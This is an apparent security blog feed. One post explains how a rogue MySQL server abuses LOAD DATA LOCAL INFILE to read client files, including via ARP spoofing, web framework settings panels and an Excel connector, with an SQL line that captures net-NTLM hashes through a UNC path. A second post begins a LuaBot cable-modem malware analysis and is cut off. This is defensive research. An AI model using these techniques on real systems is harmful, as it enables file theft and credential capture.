tag:blogger.com,1999:blog-32964711080826938382023-11-18T15:48:40.102-03:00w00tsecembedded device & webapp hackingBernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.comBlogger21125tag:blogger.com,1999:blog-3296471108082693838.post-89663764841034530882018-04-23T10:27:00.000-03:002018-04-23T16:10:10.393-03:00Abusing MySQL LOCAL INFILE to read client filesRecently, I was playing the <a href="https://ctftime.org/event/539/tasks/">VolgaCTF 2018 CTF</a> with my teammates from <a href="https://twitter.com/thegooniesctf">TheGoonies</a> and we came across an interesting Web challenge that we didn't manage to solve during the competition. The following day, I read the <a href="https://github.com/balsn/ctf_writeup/tree/master/20180324-volgactf#corp-monitoring-unsolved-written-by-bookgin-special-thanks-to-admin-aleksey">write-up</a> and learned a cool technique to attack the MySQL client directly via the LOAD DATA INFILE statement.<br />
<br />
The "<a href="https://ctftime.org/task/5642">Corp Monitoring</a>" task consisted of a Corporate Monitoring API that would test the healthcheck of a given server by connecting and verifying if the FTP, Web and MySQL servers were up. The MySQL user for the connection was restricted and the healthcheck validation was based on a few queries including the "SHOW DATABASE" command.<br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">The key to solve the challenge was to identify the "Can Use LOAD DATA LOCAL" client capability and point the API to a Rogue MySQL server that would read arbitrary files from the client via LOAD DATA INFILE statements.</span><br />
<br />
After reading about the technique, I decided to check how several libraries, clients and Web Frameworks could be exploited. I also ended up writing a a Bettercap module to abuse this feature in combination with MITM attacks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFDtcMQHc7MqFy-KZX-CtVfVGWq_DvUwBlZUhVuzCw8o4xcO_M0ifx4F6K60rMTP2RikYJdDzWO5ip-V_I9XV3DByIGdOzGHqYrppL-dldJT3KqAP7xrX5TJWfKpEiNBP-WXqhwx7MqYoN/s1600/bettercap-mysql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1114" data-original-width="1118" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFDtcMQHc7MqFy-KZX-CtVfVGWq_DvUwBlZUhVuzCw8o4xcO_M0ifx4F6K60rMTP2RikYJdDzWO5ip-V_I9XV3DByIGdOzGHqYrppL-dldJT3KqAP7xrX5TJWfKpEiNBP-WXqhwx7MqYoN/s320/bettercap-mysql.png" width="320" /></a></div>
<br />
<br />
<b style="text-align: center;">Previous Research</b><br />
<b style="text-align: center;"><br /></b>
Before I start I would like to point that this technique is not new: it's a <a href="https://dev.mysql.com/doc/refman/5.7/en/load-data.html">known and documented feature</a> from the MySQL clients. I gathered prior posts, tools and presentations and they're all written by Russians - it looks like these techniques are not very widespread outside there.<br />
<br />
- <a href="https://www.slideshare.net/qqlan/database-honeypot-by-design-25195927">Database Honeypot by design</a> - Presentation from Yuri Goltsev (August 2013)<br />
- <a href="https://github.com/allyshka/Rogue-MySql-Server">Rogue-MySql-Server Tool</a>: MySQL fake server to read files of connected clients (September 2013)<br />
- <a href="http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/">MySQL connect file read</a> - Post from the Russian Security (April 2016)<br />
<br />
<br />
<b>Revisiting MySQL LOAD DATA INFILE</b><br />
<br />
According to the <a href="https://dev.mysql.com/doc/internals/en/connection-phase.html">MySQL documentation</a>, the handshake connection phase performs the following tasks:<br />
<br />
- Exchange the capabilities of client and server<br />
- Setup SSL communication channel if requested<br />
- Authenticate the client against the server<br />
<br />
After the successful authentication, the client sends the query and waits for the server response before actually doing something. The "Client Capabilities" packet includes an entry called "Can Use LOAD DATA LOCAL".<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMH3G-9-ndfNUJd8JLBZVjoV3PEDRPvgx4MGG0TlFQYAPgfItAC8nJ3hIhekJNyELoddlJdhgz3jG1M07m0m7F7t49YhCvIBEzGtsCVwsLjtg3P7YKskAMuW9bqSN9xGVDLbjHSr3T9imZ/s1600/conn.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1182" data-original-width="1386" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMH3G-9-ndfNUJd8JLBZVjoV3PEDRPvgx4MGG0TlFQYAPgfItAC8nJ3hIhekJNyELoddlJdhgz3jG1M07m0m7F7t49YhCvIBEzGtsCVwsLjtg3P7YKskAMuW9bqSN9xGVDLbjHSr3T9imZ/s400/conn.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LOAD DATA LOCAL Set? You're gonna have a bad time.</td></tr>
</tbody></table>
<br />
This is where things start to become interesting. As long as the client enables the capability (via --enable-local-infile flag, for example), the file will be read from the local machine running the MySQL client and transferred to the server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNRL60s7xhk5JOqM8_V5vKlGXk1Vg-eOha81rZ31RQluDTb5xffZ7ORvp8pfxuCCTET-WfYOlvOkVIQYoMmg53NuUi6fs5SBbwLc0-BbcduZ2JbjjJAxMQQ2NZNhK7ErSU1vj4-qSCpoGR/s1600/Screen+Shot+2018-04-21+at+18.48.13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1140" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNRL60s7xhk5JOqM8_V5vKlGXk1Vg-eOha81rZ31RQluDTb5xffZ7ORvp8pfxuCCTET-WfYOlvOkVIQYoMmg53NuUi6fs5SBbwLc0-BbcduZ2JbjjJAxMQQ2NZNhK7ErSU1vj4-qSCpoGR/s400/Screen+Shot+2018-04-21+at+18.48.13.png" width="400" /></a></div>
<br />
<div>
One particular feature from the MySQL protocol is that the client simply doesn't keep track of the requested commands, executing the queries purely based on the server response.</div>
<div>
<br /></div>
<div>
This means that a rogue MySQL server can simulate the initial handshake, wait for the SQL statement packet, ignore it and respond with a LOCAL DATA INFILE request. Cool isn't it?<br />
<br />
For successfully exploitation we also need the client to make at least one query to our Rogue MySQL server. Fortunately, most MySQL clients and libraries make at least one query after the handshake in order to fingerprint the platform, for example (select @@version_comment limit 1).</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic4tE86p5j2k8pcT7Iz5oYz0vmzcPx9QwLMgqpB1P8X68lr85C8aOa0DfZfv7-S2ulE8q1GWdrC39EDWOLGiNT-wW_TxqkSywsXzeqALNIHi0z7ApZfE7wfFNm-AxN1WTDpN3zxt6spQW-/s1600/Screen+Shot+2018-04-21+at+18.32.18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1156" data-original-width="1600" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic4tE86p5j2k8pcT7Iz5oYz0vmzcPx9QwLMgqpB1P8X68lr85C8aOa0DfZfv7-S2ulE8q1GWdrC39EDWOLGiNT-wW_TxqkSywsXzeqALNIHi0z7ApZfE7wfFNm-AxN1WTDpN3zxt6spQW-/s400/Screen+Shot+2018-04-21+at+18.32.18.png" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Because most MySQL clients don't enforce encryption, it's quite easy to impersonate a MySQL server using tools like <a href="https://github.com/bettercap/bettercap">Bettercap</a>. They simply don't care about the integrity and authenticity of the communication.<br />
<br />
<br />
<b>MITM + Bettercap + Rogue MySQL Server = WIN</b><br />
<br />
<a href="https://github.com/bettercap/bettercap">Bettercap</a> is the Swiss army knife for network attacks and monitoring. It supports <a href="https://github.com/bettercap/bettercap/tree/master/modules">several modules</a> for ARP/DNS spoofing, TCP and packet proxy etc. I had a quick look on how its modules work and hacked a simple MySQL server that will abuse the LOAD DATA LOCAL INFILE feature to read client files.<br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">Firstly, I sniffed the MySQL traffic while the client connects and request to read a LOCAL INFILE. I exported the server responses as byte arrays and defined the components in the Golang code:</span><br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">
<script src="https://gist.github.com/bmaia/14e267c984fb88f0a5282d06a7f73e27.js"></script>
</span><br />
<span style="text-align: center;">Writing a module for Bettercap is very simple and the core of the Rogue MySQL server is as follows:</span><br />
<br />
<script src="https://gist.github.com/bmaia/adc503231ffff19a77aaf0c7abd2e895.js"></script>
Here's the module in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDNO6K1df5treOXKGjEwDGfTG_a5RL82aBwRaAzg68S2A24V2_K5h6bR7o4pj5NI3HrqMEudgiJqqsqyUQSTdvsIHeBg1MQsMtJGlJLOwGEaM_ExeMICs731-X5YOyebLJjPdw9Gygs9Zl/s1600/bettarcapz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1278" data-original-width="1586" height="514" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDNO6K1df5treOXKGjEwDGfTG_a5RL82aBwRaAzg68S2A24V2_K5h6bR7o4pj5NI3HrqMEudgiJqqsqyUQSTdvsIHeBg1MQsMtJGlJLOwGEaM_ExeMICs731-X5YOyebLJjPdw9Gygs9Zl/s640/bettarcapz.png" width="640" /></a></div>
<br />
<br />
The module includes the following options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuz2gCfF3gXkAimBZ8-y7qLd8PbgskQzn1wqbZwPMy7Bjeu6yYTuU16FXPUOIFLTYcPU73gq26xclmuBVwI62lhs2_Nth3SSxSR4TW6K23iHpB_4l1HMf7aNZO6oz7I6J3lE_eQYVtScmf/s1600/Screen+Shot+2018-04-21+at+19.49.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="1238" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuz2gCfF3gXkAimBZ8-y7qLd8PbgskQzn1wqbZwPMy7Bjeu6yYTuU16FXPUOIFLTYcPU73gq26xclmuBVwI62lhs2_Nth3SSxSR4TW6K23iHpB_4l1HMf7aNZO6oz7I6J3lE_eQYVtScmf/s640/Screen+Shot+2018-04-21+at+19.49.48.png" width="640" /></a></div>
<br />
<br />
It's worth mentioning that the INFILE format also supports UNC paths. If the client connecting to your rogue MySQL server is running on Windows, it's also possible to retrieve net-NTLM hashes, using the query below:<br />
<br />
<div class="code">
LOAD DATA LOCAL INFILE '\\\\172.16.136.153\\test' into table mysql.test FIELDS TERMINATED BY "\n";</div>
<br />
Here's a quick video illustrating this technique:<br />
<br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/3HVW-toqfCM" width="660"></iframe>
<br />
If you have a privileged network position and perform DNS or ARP spoofing, you can also redirect the MySQL traffic from legit databases to your rogue server and read arbitrary client files.<br />
<br />
As far as I know, it's not possible to simply redirect TCP traffic from Host A to Host B using Bettercap. I wrote a quick and dirty hack for <a href="https://github.com/bettercap/bettercap/blob/master/modules/tcp_proxy.go">tcp_proxy.go</a> to handle that:<br />
<br />
<script src="https://gist.github.com/bmaia/73f796e970e8eb9e7cd846620bba58b4.js"></script>
Here's the ARP spoofing and the MySQL LOAD DATA LOCAL INFILE in action:<br />
<br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/kHR5dd0qVG4" width="660"></iframe>
<br />
<br />
I sent a pull request to the project with the Rogue MySQL Server, let's hope that <a href="https://twitter.com/evilsocket">@evilsocket</a> accept it. If my pull request is accepted, I will also ask them the best way to redirect TCP traffic (maybe another module or a setting for the TCP Proxy). I will update the post with the upcoming official solution.<br />
<br />
<br />
<b>MySQL Command-Line Clients</b></div>
<div>
<b><br /></b></div>
<div>
The mysql client from Homebrew/macOS (mysql: stable 5.7.21, devel 8.0.4-rc) properly enforces the LOCAL-INFILE flag and won't let you read client files without explicitly enabling it:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_esnxfkpHGH0_0shiZbFXdXeQh9QOPq-Iki_HWRQtC4auDFA8Ub2J1JNd0LR4lZ_1lNWr7pwTKfOKoVjUhljpTBZv5gtigRFUDittb2Jqi6eU2S0UHVCVyS-imTSwZfu_q_qXs7OyAP1s/s1600/Screen+Shot+2018-04-21+at+18.57.46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1140" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_esnxfkpHGH0_0shiZbFXdXeQh9QOPq-Iki_HWRQtC4auDFA8Ub2J1JNd0LR4lZ_1lNWr7pwTKfOKoVjUhljpTBZv5gtigRFUDittb2Jqi6eU2S0UHVCVyS-imTSwZfu_q_qXs7OyAP1s/s640/Screen+Shot+2018-04-21+at+18.57.46.png" width="640" /></a></div>
<div>
<br /></div>
<div>
For some reason, several clients like the Ubuntu default mysql-client (5.7.21-0ubuntu0.17.10.1, as of this writing) automatically sets that flag during the connection:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbKH0eHgkZo5EZ-ufeskVg6PpVKizYlnHBlznXNDi2XGVlkyyok_Svxgel1iGZD2ke_Svow0b474v1I8eM2fcPcop1Okpov4YU0LyQiCWql-jDE0KzRO9D3kupPHNoe6GT3aTty9aGZKrk/s1600/Screenshot+at+2018-04-21+19-02-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="738" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbKH0eHgkZo5EZ-ufeskVg6PpVKizYlnHBlznXNDi2XGVlkyyok_Svxgel1iGZD2ke_Svow0b474v1I8eM2fcPcop1Okpov4YU0LyQiCWql-jDE0KzRO9D3kupPHNoe6GT3aTty9aGZKrk/s640/Screenshot+at+2018-04-21+19-02-33.png" width="640" /></a></div>
<div>
<br /></div>
<div>
The same happens with the Windows client bundled with MySQL Workbench, there's no need to enable the flags to read local files:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx2-7-GtCvwaw1BYB4idYeFmwib6oiXdhPjSlNCt72EHZ13teIdA_AW_zjhWbpOhTmzjBFGk2Vjb-VVAHus5Jgg9Uq1AhnKlzDHOi9Gjxeb3-s3addMI-wxwwhO7f2triuK9CLGMhRSkJ2/s1600/mysqlwin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="677" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx2-7-GtCvwaw1BYB4idYeFmwib6oiXdhPjSlNCt72EHZ13teIdA_AW_zjhWbpOhTmzjBFGk2Vjb-VVAHus5Jgg9Uq1AhnKlzDHOi9Gjxeb3-s3addMI-wxwwhO7f2triuK9CLGMhRSkJ2/s640/mysqlwin.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<b>Abusing Web Frameworks to read server files</b><br />
<br />
<div>
This insecure by default behavior also occurs in several libraries, Frameworks and MySQL connectors out there: most of them enable to LOCAL-INFILE flag by default. In this case, when a Web-user modify a form containing a MySQL host and point it to a rogue server, he can read local files from the system.<br />
<br />
This functionality is very common in Monitoring/Dashboard applications and Framework install scripts, that allow the user to set the database on-the-fly via the admin panel.</div>
<div>
<br /></div>
The good news here is that most Web-applications restrict the panels for changing MySQL settings to administrator users only. The bad news is that your admin is one XSS/CSRF/Clickjacking away from being exploited. Here's a quick overview on how some PHP frameworks can be abused:<br />
<br />
<br />
<ul>
<li><b>Joomla v3.8.7</b></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoA_3KmRTFI-QmzpQQf3dk6cGW6gLuRRNEDbf1MtfKzEBID1KmeRfaYec_I386rx66NprwVvQp8ZiOaOjhqn_CCiZcMIVDQ9dIKHPusWVvU40Flu9TBknTyWcp4lJTGytyWBP36zzfbsLp/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1069" data-original-width="1600" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoA_3KmRTFI-QmzpQQf3dk6cGW6gLuRRNEDbf1MtfKzEBID1KmeRfaYec_I386rx66NprwVvQp8ZiOaOjhqn_CCiZcMIVDQ9dIKHPusWVvU40Flu9TBknTyWcp4lJTGytyWBP36zzfbsLp/s640/joomla.png" width="640" /></a></div>
<br />
<br />
<ul>
<li><b>Wordpress v4.9.5</b></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwMXCo0z8o5O7AtLbd-ib8xqHUhgn_aJfRTNJmTAfDwJcW0fjq5sj35VtbxG4JQqjU9CNWSTZ7I9flamt4BJPcEzza9HYBwgO7STu8wxx8q1R5Hwqjd0_U6lXeT9fnLDuT0W7bHpqJpoiy/s1600/wordpress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="990" data-original-width="1600" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwMXCo0z8o5O7AtLbd-ib8xqHUhgn_aJfRTNJmTAfDwJcW0fjq5sj35VtbxG4JQqjU9CNWSTZ7I9flamt4BJPcEzza9HYBwgO7STu8wxx8q1R5Hwqjd0_U6lXeT9fnLDuT0W7bHpqJpoiy/s640/wordpress.png" width="640" /></a></div>
<br />
<br />
<ul>
<li><b>Zabbix v3.4.8</b></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-15psH5tBQm6ekqkpJkXw4Jw8opKTAKc1_oqxneO24k2uJnxlzaZT5v46aVW_dDm1GPCg5viMdCi6Q4BtzG0jNNvllV70vhAR0YGA2mUK4P-p3JmWEZ4-AbjQ35OmM2Q6HCJJtboitD8H/s1600/zabbix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1165" data-original-width="1600" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-15psH5tBQm6ekqkpJkXw4Jw8opKTAKc1_oqxneO24k2uJnxlzaZT5v46aVW_dDm1GPCg5viMdCi6Q4BtzG0jNNvllV70vhAR0YGA2mUK4P-p3JmWEZ4-AbjQ35OmM2Q6HCJJtboitD8H/s640/zabbix.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<br />
<ul>
<li><b>Drupal v8.5.2 </b>(Not vulnerable)</li>
</ul>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy5LsA_p5Q-IAxFWJJ1W-FoZvfEMJMYKgc8BwiFVNzqbBQ8ZL5CowWqKugfuIjinoKDNjwEZanKj0xMZKI8e7K_TOnskx9-GPMXUt3fY-_xw7Vo9cau7M80nNmbUcZ_KanARHzbOnUHEKw/s1600/drupal.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1143" data-original-width="1600" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy5LsA_p5Q-IAxFWJJ1W-FoZvfEMJMYKgc8BwiFVNzqbBQ8ZL5CowWqKugfuIjinoKDNjwEZanKj0xMZKI8e7K_TOnskx9-GPMXUt3fY-_xw7Vo9cau7M80nNmbUcZ_KanARHzbOnUHEKw/s640/drupal.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Drupal was probably too busy being vulnerable to RCEs</td></tr>
</tbody></table>
<br />
<br />
<b>Bonus: Abusing Excel MySQL Connector</b><br />
<br />
If you have a Microsoft Office installation on your Windows machine and the <a href="https://dev.mysql.com/downloads/connector/net/">MySQL Connector/Net</a> is installed, it's possible to create a spreadsheet that connects to a rogue MySQL server. The connector is installed by default with the <a href="https://dev.mysql.com/downloads/installer/">Windows MySQL installer</a> and you probably have it if you use a tool to connect/manage MySQL databases or if your machine is running MySQL server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjUNpqbJeWtd3VVKDqDQkX3ThOIH961LDS68pTRF1-KXdW9khpSWhutJkB-YqUx3Nh9CbXGo1_1ToK4iVM7_PlVl5pbnQuZbtIMV68qPMIoIFKz1Hkc6l9cxnaaZmrpww6QUO-nVyOQse/s1600/mysql-install.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="800" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjUNpqbJeWtd3VVKDqDQkX3ThOIH961LDS68pTRF1-KXdW9khpSWhutJkB-YqUx3Nh9CbXGo1_1ToK4iVM7_PlVl5pbnQuZbtIMV68qPMIoIFKz1Hkc6l9cxnaaZmrpww6QUO-nVyOQse/s400/mysql-install.PNG" width="400" /></a></div>
<br />
In order to create a document that connects to a MySQL server, we need to go to the Data tab, choose New Query>From Database>From MySQL Database. We enter the server details, username, password, query and save the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQHf-oc-VdgYh2yN-dFeYHJTAik_WJit7cJgyA4RnsXaeKYDxKdCkKernNUN1MWTyhWvcsbZq7_d681oOqxLeYN2XHmgggPPrBGQgv752cu2hAZ0_zAAThmeh2vOeMzQB8lnFmKq0J7bMI/s1600/mysql-excel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1013" data-original-width="1022" height="395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQHf-oc-VdgYh2yN-dFeYHJTAik_WJit7cJgyA4RnsXaeKYDxKdCkKernNUN1MWTyhWvcsbZq7_d681oOqxLeYN2XHmgggPPrBGQgv752cu2hAZ0_zAAThmeh2vOeMzQB8lnFmKq0J7bMI/s400/mysql-excel.png" width="400" /></a></div>
<br />
<br />
If you download the document from the Internet, the receiver needs to put the document in editing mode before the remote server will be contacted. For some reason, we need to close/reopen Excel for the query to work. Also, Excel only displays the security warning during the first time you open the file and stops to do so as soon as you enable the external content.<br />
<br />
Here's another demo:<br />
<br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/iBGbHYJAXSg" width="660"></iframe>
<br />
<br />
<b><br /></b>
<b>Conclusion</b><br />
<br />
Despite the efforts from Duo Security (they had a website AND a logo) with the <a href="https://duo.com/blog/backronym-mysql-vulnerability">BACKRONYM MySQL vulnerability</a>, not much is being done to enforce proper encryption to MySQL servers. Web applications and Frameworks rarely support encryption and TLS validation for the MySQL connection. <span style="text-align: center;">The unencrypted protocol is not secure and, given a password hash and a </span>successful authentication handshake, one can <a href="https://github.com/cyrus-and/mysql-unsha1">successfully login on the server</a>.<br />
<br />
MySQL libraries and connectors should establish secure patterns and disable LOCAL-INFILE support by default. I really like the way the <a href="https://github.com/go-sql-driver/mysql">Go MySQL Driver</a> works: it supports LOCAL-INFILE via whitelisting and the library documentation explicitly advises that the feature "Might be insecure!"<br />
<div>
<br /></div>
<div>
This feature can also be abused in honeypots and vulnerability scanners. It should be quite interesting to pwn security tools while they scan your MySQL host. If your application register a MySQL URI handler, your system might be exploited via website links.<br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">Another interesting way to abuse MySQL clients is via downgrade attacks, switching to older insecure password authentication and verifying how they behave. But this post is already too long for that...</span><br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">Thanks for reading! </span><br />
<span style="text-align: center;"><br /></span></div>
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-48604607850491979102016-09-12T12:08:00.000-03:002016-12-01T18:15:55.586-02:00LuaBot: Malware targeting cable modems<span style="font-family: inherit;">During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a <a href="https://w00tsec.blogspot.com/2015/11/arris-cable-modem-has-backdoor-in.html">blogpost about ARRIS' nested backdoor</a> and detailed some of my cable modem research during the 2015 edition from <a href="https://www.nullbyte-con.org/">NullByte Security Conference</a>.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">CERT/CC released the Vulnerability Note <a href="https://www.kb.cert.org/vuls/id/419568">VU#419568</a> and it got <a href="http://www.theregister.co.uk/2015/11/20/arris_modem_backdoor/">lots</a> <a href="http://news.softpedia.com/news/backdoor-within-backdoor-puts-over-600-000-arris-cable-modems-in-danger-496485.shtml">of</a> <a href="https://hardware.slashdot.org/story/15/11/21/0428215/600000-arris-cable-modems-have-backdoors-in-backdoors-researcher-claims">media</a> <a href="http://www.tomshardware.com/news/double-backdoor-arris-cable-modems,30620.html">coverage</a>. I did not provide any POC's during that time because I was pretty sure that those vulnerabilities were easily wormable... And guess what? Someone is actively exploiting those devices since May/2016.</span><br />
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">The malware targets <a href="https://www-ssl.intel.com/content/www/us/en/cable-modems/puma5-product-brief.html">Puma 5</a> (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many <a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/">common worm</a> that <a href="https://quantumfilament.co/2015/08/17/chapter-2-the-binary/">targets embedded devices</a> from <a href="https://isc.sans.edu/diary/19999">multiple architectures</a>. The final stage is an ARMEB version from the <a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-090915-3236-99">LuaBot Malware</a>.</span><br />
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAdZqoVKRoWbH_cjqHenQeJXdXDO7ycjQuvD5gbObLww7rmXwsPDYhzCKGIKSfYACUQof6HsE9k_0o3XbIOMeJleJ9e5PM31btJUqAD-NeaczcdFdcfC6hF3ZcJP78pEjm-N-lZbSuV7vN/s1600/ps.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAdZqoVKRoWbH_cjqHenQeJXdXDO7ycjQuvD5gbObLww7rmXwsPDYhzCKGIKSfYACUQof6HsE9k_0o3XbIOMeJleJ9e5PM31btJUqAD-NeaczcdFdcfC6hF3ZcJP78pEjm-N-lZbSuV7vN/s400/ps.png" width="400" /></span></a></div>
<div>
<br />
The ARMEL version from the LuaBot Malware was dissected on a <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">blogpost from Malware Must Die</a>, but this specific ARMEB was still unknown/undetected for the time being. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85wDThZ9TkzdTGpu8vtOA2sQMUaOUNtkwGGOdGaqFz-5C6CWdEX8KMuy5EVoMosKSg6A1hrtn7_Ue2q6NKHQZgm6zi9NjkHzQHy2uFdBTZFpiHhgcY8m9ldmP3dEy9L-d1w5YJRL63jSr/s1600/vtotal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85wDThZ9TkzdTGpu8vtOA2sQMUaOUNtkwGGOdGaqFz-5C6CWdEX8KMuy5EVoMosKSg6A1hrtn7_Ue2q6NKHQZgm6zi9NjkHzQHy2uFdBTZFpiHhgcY8m9ldmP3dEy9L-d1w5YJRL63jSr/s400/vtotal.PNG" width="400" /></a></div>
<br />
<br /></div>
<div>
<div>
<b><span style="font-family: inherit;">Cable Modem Security and ARRIS Backdoors</span></b></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">Before we go any further, if you want to learn about cable modem security, grab the slides from my talk "Hacking Cable Modems: The Later Years". The talk covers many aspects of the technology used to manage cable modems, how the data is protected, how the ISPs upgrade the firmwares and so on.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<ul>
<li><span style="font-family: inherit;"><a href="https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf">https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf</a></span></li>
</ul>
</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">Pay special attention to the slide #86:</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
